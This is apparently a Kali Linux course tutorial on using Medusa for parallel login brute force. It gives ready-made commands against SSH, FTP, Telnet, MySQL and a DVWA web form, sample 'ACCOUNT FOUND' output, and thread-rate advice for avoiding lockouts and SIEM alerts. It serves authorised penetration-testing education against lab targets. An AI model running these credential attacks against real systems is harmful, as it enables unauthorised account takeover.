Medusa Tutorial Kali Linux 2026 — Parallel Brute Force Complete Guide

🐉 KALI LINUX MASTERY
FREE

Day 20 of 180 · 11.1% complete

⚠️ Authorised Testing Only: Medusa is a login brute force tool. Use it exclusively against systems you own, systems in authorised penetration test scope, or designated lab environments (DVWA, Metasploitable, HackTheBox, TryHackMe). Brute-forcing login systems without explicit written authorisation is a criminal offence under the Computer Fraud and Abuse Act and equivalent laws worldwide.

Every pen tester hits this moment: you have a list of valid usernames from your recon, you have a rockyou-derived wordlist tailored to the organisation, and you need to test 400 SSH accounts across a 10-machine internal network before the engagement window closes. This is what Medusa is built for.

Hydra gets more YouTube tutorials. Medusa is what I reach for when I need parallel multi-host brute force that doesn’t choke itself at scale. Its architecture is genuinely different — modular protocol support, true parallel job management, and a clean failure-handling model that doesn’t silently skip hosts. Once you understand how it manages connection threads versus hosts versus modules, you use it differently and you get better results.

Here, I’m walking you through Medusa from zero — setup, module selection, rate control, and the specific flags that separate a professional credential test from a noisy, detectable, and incomplete scan.

🎯 What You’ll Master in Day 20

Run Medusa against SSH, FTP, and HTTP services with correct module syntax

Configure parallel threads and rate limits to balance speed against lockout risk

Attack web login forms using the web-form module with custom POST parameters

Compare Medusa vs Hydra — when each tool is the better choice

Build a complete credential attack workflow combining Day 18 Crunch + Day 19 Hashcat + Day 20 Medusa

⏱️ 40 min · 3 terminal exercises · Kali Linux required

📋 Prerequisites — Day 20

Day 18: Crunch — Custom wordlist generation used in today’s exercises
Day 19: Hashcat — Offline hash cracking; Medusa is the online equivalent for live services
A lab target — DVWA, Metasploitable, or a HackTheBox/TryHackMe machine. Never test against systems you don’t own.

📋 Medusa Tutorial — Day 20 Contents

How Medusa Works — Parallel Architecture and Module System
Core Syntax and Essential Flags
SSH Brute Force with Medusa
HTTP Form Brute Force
Thread Control and Lockout Avoidance
Medusa vs Hydra — Choosing the Right Tool

How Medusa Works — Parallel Architecture and Module System

Before you run a single command, understand the architecture — it changes how you construct your attacks. Medusa separates the core engine from the protocol-specific modules. Each module handles one protocol (SSH, FTP, HTTP, SMB, RDP, LDAP, etc.) is implemented as a separate module, allowing Medusa to support new services by adding modules without changing the core engine. Run medusa -d to list all installed modules on your Kali system. Each module handles the specific authentication flow for its protocol, including the handshake, credential submission format, and success/failure detection logic.

The parallelism model is thread-based. Medusa spawns a pool of worker threads, each handling a separate authentication attempt simultaneously. The -t flag controls the total number of parallel threads across all hosts. The -T flag controls threads per host when attacking multiple targets simultaneously. This architecture means Medusa’s speed scales with thread count and CPU cores — on a modern multi-core system with a fast network connection, Medusa can test thousands of credentials per minute against protocols with low per-attempt overhead.

securityelites.com

Medusa Module List — medusa -d (selected)
ssh
ftp
http
https
smb
rdp
telnet
smtp
imap
pop3
ldap
mysql
mssql
postgres
web-form
Full list: medusa -d | grep Module

📸 Medusa module list showing 15 of 20+ supported protocols. Each module is a separate .mod file handling the authentication specifics for its protocol. The web-form module is the most configuration-intensive — it requires specifying the POST parameters, the target URL path, and the failure string. All other modules work with minimal configuration beyond host, username/password source, and module name.

Core Syntax and Essential Flags

Medusa’s syntax follows a consistent pattern across all modules. The minimum required flags are: -h (target host), credentials (either single values with -u/-p or list files with -U/-P), and -M (the module/protocol). All other flags modify behaviour — thread count, output format, module-specific options.

MEDUSA CORE FLAGS REFERENCE

# Target specification

-h [host] # single host IP or hostname

-H [file] # host list file (one per line)

# Credentials

-u [username] # single username

-U [file] # username list file

-p [password] # single password

-P [file] # password list file

# Module and output

-M [module] # protocol module (ssh, ftp, http, etc.)

-t [N] # total parallel threads (default: 16)

-T [N] # threads per host

-f # stop on first success per host

-F # stop on first success across all hosts

-O [file] # output to file

-v [0-6] # verbosity level (6 = max debug)

-w [seconds] # wait between attempts

-m [options] # module-specific options (varies per module)

SSH Brute Force with Medusa

SSH is the most common Medusa target in penetration testing because SSH is exposed on virtually every Linux server and many network devices. The SSH module handles the protocol handshake automatically — you only need to specify the target, credentials, and thread count. The primary consideration for SSH brute force is thread count: SSH servers commonly implement rate limiting and tools like fail2ban monitor SSH authentication failures. Setting too many threads triggers blocking after a small number of attempts. For authorised assessments, start with 2-4 threads and verify the client’s lockout policy before increasing.

MEDUSA SSH BRUTE FORCE — COMPLETE EXAMPLES

# Basic SSH attack — single username, password list

medusa -h 192.168.1.100 -u root -P /usr/share/wordlists/rockyou.txt -M ssh

# SSH with username list and password list — limited threads

medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh -t 4 -f

# SSH — stop on first success, verbose output

medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh -t 2 -f -v 4

# SSH against non-standard port

medusa -h 192.168.1.100 -n 2222 -u admin -P passwords.txt -M ssh -t 4

# SSH — multiple hosts from file, save output

medusa -H targets.txt -U users.txt -P passwords.txt -M ssh -t 4 -T 2 -O results.txt

# Success output looks like:

ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: admin Password: password123 [SUCCESS]

⚡ EXERCISE 1 — KALI TERMINAL (20 MIN)

Brute Force SSH on Metasploitable with Medusa

⏱️ 20 minutes · Kali Linux required · Target: Metasploitable 2 (own lab only)

# SETUP — Start Metasploitable 2 in your lab environment
# Confirm your Kali can reach it: ping [metasploitable-ip]

# Step 1: Verify Medusa is installed
medusa –version
medusa -d | grep -i ssh

# Step 2: Create a small test wordlist (avoid large wordlists on lab)
cat > test_users.txt << 'EOF' msfadmin root admin user EOFcat > test_pass.txt << 'EOF' msfadmin password 123456 root admin EOF# Step 3: Run SSH brute force against Metasploitable # Metasploitable default credentials: msfadmin/msfadmin medusa -h [METASPLOITABLE_IP] -U test_users.txt -P test_pass.txt -M ssh -t 2 -v 4# Step 4: Confirm the ACCOUNT FOUND line # Expected: msfadmin:msfadmin# Step 5: Add -f flag to stop after first success medusa -h [METASPLOITABLE_IP] -U test_users.txt -P test_pass.txt -M ssh -t 2 -f# Step 6: Save results to file medusa -h [METASPLOITABLE_IP] -U test_users.txt -P test_pass.txt -M ssh -t 2 -f -O ssh_results.txt cat ssh_results.txt

✅ What you just learned: Medusa’s SSH module works through the full SSH handshake automatically — you just supply credentials. The -f flag is critical in real engagements: once you have one valid credential, you typically want to stop and use it rather than continuing to generate noise on the target. The -v 4 verbosity shows you exactly what Medusa is doing — each attempt, each failure reason — which is essential for understanding why it might not be finding credentials when you expect it to.

📸 Screenshot the ACCOUNT FOUND output. Share in #kali-course on Discord.

HTTP Form Brute Force

The web-form module is Medusa’s most configuration-intensive but also one of its most valuable. It sends POST requests to a web login form, substituting username and password wordlist entries into the form parameters. To configure it correctly you need three pieces of information: the login form’s POST URL path, the POST parameter names for username and password (from inspecting the form source), and the string that appears in the response body on a failed login attempt. Medusa uses the failure string to detect unsuccessful attempts — any response not containing that string is treated as a success.

MEDUSA HTTP FORM BRUTE FORCE — DVWA EXAMPLE

# DVWA login form POST parameters:

# URL: /dvwa/login.php

# Params: username=&password=&Login=Login

# Failure string: “Login failed”

medusa -h 127.0.0.1 -u admin -P /usr/share/wordlists/rockyou.txt \

-M web-form \

-m “FORM:/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed” \

-t 4 -f

# web-form module -m format breakdown:

# FORM:[path]:[post_params]:[failure_string]

# ^USER^ = username placeholder

# ^PASS^ = password placeholder

# HTTPS form (add -m option for SSL)

medusa -h target.com -u admin -P passwords.txt -M web-form \

-m “FORM:/login:username=^USER^&password=^PASS^:Invalid credentials” -t 4

⚡ EXERCISE 2 — KALI TERMINAL (20 MIN)

Brute Force DVWA Web Login with Medusa web-form Module

⏱️ 20 minutes · Kali Linux + DVWA required

# Step 1: Start DVWA and confirm it’s accessible
# Default: http://127.0.0.1/dvwa/login.php

# Step 2: Inspect the login form
# In Firefox DevTools → Network → submit a test login
# Note the POST URL, parameter names, failure message

# Step 3: Verify the failure string
curl -s -X POST http://127.0.0.1/dvwa/login.php \
-d “username=wronguser&password=wrongpass&Login=Login” | grep -i “failed\|invalid\|error”

# Step 4: Create test credentials
cat > dvwa_pass.txt << 'EOF' password admin password password123 abc123 letmein EOF# Step 5: Run web-form brute force against DVWA # DVWA default credentials: admin/password medusa -h 127.0.0.1 -u admin -P dvwa_pass.txt \ -M web-form \ -m "FORM:/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" \ -t 2 -v 4# Step 6: Confirm success output # Expected: ACCOUNT FOUND: [web-form] ... password: password [SUCCESS]

✅ What you just learned: The web-form module requires manual inspection of the login form — Medusa can’t automatically discover the POST parameters. This step (identifying form parameters and failure strings) is the same process you’d follow for any web login brute force. The failure string must exactly match something in the failed login response — a partial match is fine but it must be something that ONLY appears on failure, not on success. Using Burp Suite to capture the login request (which you’ll learn in Day 24) makes this parameter identification process much faster.

📸 Screenshot the ACCOUNT FOUND output for DVWA. Share in #kali-course on Discord.

securityelites.com

Medusa SSH Brute Force — Live Output
$ medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh -t 4 -f -v 4
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 User: root Password: 123456 [FAILED]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 User: root Password: password [FAILED]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 User: admin Password: 123456 [FAILED]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 User: admin Password: password [FAILED]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 User: msfadmin Password: msfadmin [SUCCESS (LOGGEDIN)]
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: msfadmin Password: msfadmin [SUCCESS]

📸 Medusa SSH brute force live output with -v 4 verbosity. Each ACCOUNT CHECK line shows a real-time attempt. The SUCCESS (LOGGEDIN) message indicates the authentication succeeded at the protocol level, followed by the ACCOUNT FOUND summary line. The -f flag causes Medusa to stop after this first success rather than continuing through the remaining wordlist. In real engagements, redirect output to a file with -O results.txt to capture all findings for the penetration test report.

Thread Control and Lockout Avoidance

Thread count is the most important operational consideration when using Medusa in authorised penetration tests. Too many threads against a service with account lockout policy can lock out the administrator account — creating an incident and potentially more work than the assessment was intended to find. Too few threads and the attack takes so long it becomes impractical in a time-boxed assessment. The correct answer depends on what you know about the target’s lockout policy, which should be determined before running any brute force in a real engagement.

As a practical starting point: SSH with fail2ban = 2-4 threads maximum, with a 1-second wait. HTTP forms with no visible lockout = 4-8 threads. FTP = 4-6 threads. RDP = 2-4 threads (Windows RDP has aggressive lockout by default). SMB = 2-3 threads (Active Directory lockout policies are common). If the rules of engagement allow it, ask the client for their lockout threshold before starting credential testing — knowing “5 failed attempts locks for 30 minutes” immediately tells you to stay well below 5 attempts per account, which may mean running user/pass combinations differently from a pure password spray.

Medusa vs Hydra — Choosing the Right Tool

Both Medusa and Hydra are standard Kali Linux tools for network login brute force, and they overlap significantly in capability. The practical differences that affect tool choice are: Hydra has broader protocol support (including Oracle, Cisco enable, and some protocols Medusa lacks). Medusa’s parallel architecture is more efficient for single-host multi-credential attacks. Hydra’s multi-host parallelism is more efficient for subnet-wide credential spraying. Hydra’s HTTP form syntax is more flexible for complex forms with CSRF tokens. Medusa’s output is simpler and easier to parse programmatically.

securityelites.com

Medusa vs Hydra — Practical Decision Matrix
ScenarioUse MedusaUse Hydra
Single SSH target, big password list✓ Faster parallel threadingWorks too
Spray one password across a subnetWorks✓ Better multi-host architecture
Web form with CSRF tokenLimited support✓ Better form flexibility
Script/automate credential results✓ Cleaner output formatWorks

📸 Medusa vs Hydra decision matrix. In practice, most penetration testers use both in their toolkit and select based on the specific scenario. For exam preparation (OSCP, CEH), understanding both tools is expected. For Day 20’s course context, Medusa covers the parallel architecture and module system concept clearly; Hydra is covered in its own dedicated session later in the course.

⚡ EXERCISE 3 — KALI TERMINAL (15 MIN)

FTP Brute Force and Multi-Protocol Testing on Metasploitable

⏱️ 15 minutes · Kali Linux required · Target: Metasploitable 2

# Step 1: Run FTP brute force against Metasploitable
medusa -h [METASPLOITABLE_IP] -U test_users.txt -P test_pass.txt -M ftp -t 4 -f

# Step 2: Test Telnet module (Metasploitable has Telnet open)
medusa -h [METASPLOITABLE_IP] -U test_users.txt -P test_pass.txt -M telnet -t 2 -f

# Step 3: List all open services on Metasploitable
nmap -sV -p 21,22,23,80,445,3306 [METASPLOITABLE_IP]

# Step 4: For any open database service — test MySQL
medusa -h [METASPLOITABLE_IP] -u root -P test_pass.txt -M mysql -t 2 -f

# Step 5: Build a summary table of results
# Protocol | Port | Credentials Found | Time Taken
# Document which module was fastest for which service type

# Step 6: Practice the -e flag (test null and same-as-login passwords)
medusa -h [METASPLOITABLE_IP] -U test_users.txt -e ns -M ssh -t 2
# -e n = test empty password
# -e s = test username as password (catches msfadmin:msfadmin type credentials)

✅ What you just learned: The -e ns flag is one of the most valuable Medusa options in real engagements — testing null passwords and username-as-password catches default credentials that would otherwise require a dedicated wordlist entry. Many lab machines (and surprisingly, many production systems) still have this pattern. Multi-protocol testing from a single tool highlights how Medusa’s module system enables consistent syntax across completely different authentication protocols.

📸 Screenshot your multi-protocol results table. Share in #kali-course on Discord.

⚠️ Wordlist Size and Engagement Time: Running rockyou.txt (14 million passwords) against an SSH service at 2 threads could take days. In time-boxed penetration test engagements, use targeted wordlists built with Crunch (Day 18) based on password policy intelligence from the client or OSINT. A 500-password targeted list beats 14 million generic passwords for most real-world assessments.

🧠 QUICK CHECK — Medusa

You’re running a Medusa SSH brute force and the target stops responding after 15 attempts. What most likely happened and what should you do?

📋 Medusa Command Reference — Day 20

List modulesmedusa -d

SSH brute forcemedusa -h [ip] -U users.txt -P pass.txt -M ssh -t 4 -f

HTTP web formmedusa -h [ip] -u admin -P pass.txt -M web-form -m “FORM:/path:user=^USER^&pass=^PASS^:fail_msg”

FTP brute forcemedusa -h [ip] -U users.txt -P pass.txt -M ftp -t 4 -f

Empty + username as passmedusa -h [ip] -U users.txt -e ns -M ssh -t 2

Save resultsmedusa [options] -O results.txt

🏆 Day 20 Complete — Medusa Parallel Brute Force

Day 21 covers Recon-ng — the modular OSINT framework for professional-grade passive reconnaissance at scale.

Using Medusa on Real Engagements — What the Tutorials Skip

Here’s what changes when you move from a lab environment to a real penetration test. In a lab, you run Medusa against localhost. On an engagement, you have three constraints that shape every decision: detection risk, connection limits, and scope.

Detection risk is the one most beginners ignore completely. Medusa by default runs as many parallel connections as you ask for, as fast as the target allows. On a corporate SSH service with a SIEM watching for brute force patterns, you’ll trigger alerts in minutes. The -t flag controls connections per host — I run -t 2 or -t 3 against anything with monitoring. Slow and quiet beats fast and flagged every time.

Connection limits matter on services like SMTP, where the server enforces rate limits independently of Medusa’s settings. If the service drops connections after five failed attempts per IP, your -t 10 setting does nothing useful — you’re just hitting the limit faster. Read the service documentation before you tune the thread count.

Scope is non-negotiable. Medusa with a subnet range will happily go after every host in that range. Before any scan, verify your IP target list against the signed scope document. Out-of-scope brute force is not a technicality — it’s an unauthorised access attempt regardless of whether the system is on the same network segment as an in-scope target.

ENGAGEMENT-GRADE MEDUSA — FLAGS FOR REAL ENVIRONMENTS

# Low-noise credential test — SSH, 2 threads, verbose failures only

medusa -H targets.txt -U users.txt -P pass.txt -M ssh -t 2 -f -e ns -v 4

# Resume interrupted session (Medusa saves state by default)

medusa -H targets.txt -U users.txt -P pass.txt -M ssh -t 2 -f -R medusa.restore

# Multi-protocol sweep — SSH then FTP, same host list

medusa -H targets.txt -U users.txt -P pass.txt -M ssh -t 2 -f -e ns -O ssh_results.txt

medusa -H targets.txt -U users.txt -P pass.txt -M ftp -t 2 -f -e ns -O ftp_results.txt

# -f flag = stop after first valid credential per host

# -e ns = test null password + username-as-password first

# -v 4 = show failures, only log successes to output file

# -O = write results to file for reporting

One habit worth building now: always use -O to write results to a file during engagements. Terminals get cleared, SSH sessions time out, VPN connections drop. If Medusa finds credentials at 2am and your terminal history is gone by 8am, the -O log is what you submit in your report. Make it automatic.

❓ Frequently Asked Questions — Medusa Kali Linux 2026

What is Medusa in Kali Linux?

A fast, parallel, modular login brute forcer supporting 20+ protocols including SSH, FTP, HTTP, SMB, RDP, and more. Uses a thread-based parallel architecture that makes it efficient for single-target multi-credential attacks on systems you are authorised to test.

What is the difference between Medusa and Hydra?

Medusa is faster for single-host multi-credential attacks due to its parallel threading architecture. Hydra has broader protocol support and better multi-host parallelism for subnet spraying. Both are standard Kali tools — experienced penetration testers use both depending on the scenario.

How many threads should I use with Medusa?

SSH: 2-4 maximum (fail2ban risk). HTTP forms: 4-8. FTP: 4-6. RDP: 2-4 (Windows lockout). Always check the client’s lockout policy before credential testing in authorised assessments. Start conservative and increase if no lockout is triggered.

Can Medusa crack web login forms?

Yes, using the web-form module. Requires the POST URL path, form parameter names (identified from form source inspection), and the failure string that appears in failed login responses. The -m “FORM:/path:params:failure_string” syntax specifies all three.

Is Medusa included in Kali Linux by default?

Available in Kali’s repository but not always installed by default. Check with medusa –version. Install with sudo apt install medusa if not present. Listed in Kali’s password attack tools category.

What comes after Medusa in the Kali Linux course?

Day 21 covers Recon-ng, the modular OSINT reconnaissance framework. Days 17-20 completed the credential attack chain (WPScan → Crunch → Hashcat → Medusa). Day 21 shifts back to active reconnaissance using passive OSINT modules at scale.

← Previous

Day 19: Hashcat GPU Password Cracking

Day 21: Recon-ng OSINT Framework

📚 Further Reading

Day 19: Hashcat Tutorial — Offline hash cracking to complement Medusa’s online brute force — once you have hashes from a penetration test, Hashcat cracks them without generating network noise.
Kali Linux 180-Day Course Hub — Full course overview — Day 20 completes the credential attack block that began with Day 17 WPScan, Day 18 Crunch, and Day 19 Hashcat.
How Hackers Bypass 2FA in 2026 — Why strong passwords defended by MFA dramatically reduce the effectiveness of brute force tools like Medusa — the attacker’s perspective on 2FA.
Medusa Official GitHub Repository — Source code, full module documentation, compilation instructions, and the complete list of supported protocols with module-specific options.
Kali Linux — Medusa Tool Page — Official Kali documentation for Medusa including installation, basic usage, and the full flag reference.

Mr Elite

Owner, SecurityElites.com

The -e ns flag on Medusa is the one I always run first in a credential test — test null passwords and username-as-password before touching any wordlist. In my first year of professional testing I found four critical findings from that flag alone: a root account with no password, an admin account where the password was just “admin”, and two service accounts where the password was the service name. Every time I see a sophisticated pentest report that spent days on wordlist attacks but never tested default and empty credentials, I wonder how many easy wins they missed in the first five minutes.

Scenario	Use Medusa	Use Hydra
Single SSH target, big password list	✓ Faster parallel threading	Works too
Spray one password across a subnet	Works	✓ Better multi-host architecture
Web form with CSRF token	Limited support	✓ Better form flexibility
Script/automate credential results	✓ Cleaner output format	Works

🎯 What You’ll Master in Day 20

📋 Prerequisites — Day 20

📋 Medusa Tutorial — Day 20 Contents

How Medusa Works — Parallel Architecture and Module System

Core Syntax and Essential Flags

SSH Brute Force with Medusa

HTTP Form Brute Force

Thread Control and Lockout Avoidance

Medusa vs Hydra — Choosing the Right Tool

🧠 QUICK CHECK — Medusa

📋 Medusa Command Reference — Day 20

🏆 Day 20 Complete — Medusa Parallel Brute Force

Using Medusa on Real Engagements — What the Tutorials Skip

❓ Frequently Asked Questions — Medusa Kali Linux 2026

📚 Further Reading

Leave a Comment Cancel reply